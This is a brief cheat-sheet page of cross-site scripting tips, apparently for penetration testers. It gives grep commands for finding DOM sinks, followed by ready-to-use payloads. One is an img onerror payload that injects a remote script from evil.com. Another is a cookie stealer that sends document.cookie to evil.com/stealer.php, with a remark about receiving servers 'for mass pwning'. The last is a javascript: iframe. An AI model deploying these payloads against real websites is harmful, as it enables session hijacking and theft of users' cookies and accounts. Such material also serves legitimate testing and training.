Skip to content

XSS Tips #


DOM Based #

  • Hunting (do this where downloaded JS folder is)
    • Simple document.write search:
      1
      grep -r "document.write" ./ --include "*.html"
      
    • If the user input is a variable from another js, search the variable with <VARIABLE>
      • note: there could the a space between the variable being assigned and the '=' sign\
        1
        grep -ER "<VARIABLE>[ ]+=" ./
        

Quick PoC Payloads #

  • img tag to CSRF
    1
    <img src=a onerror="x=document.createElement('script');x.src='https://evil.com/really_evil.js';document.body.appendChild(x)" />
    
  • Class cookie stealer
    • You may setup receiving servers, APIs, webhook for mass pwning
      1
      <img src=a onerror="location.href='https://evil.com/stealer.php?cookie='+document.cookie;">
      
  • iFrame
    1
    <iframe src="javascript:alert(1)">
    

Last update: February 22, 2022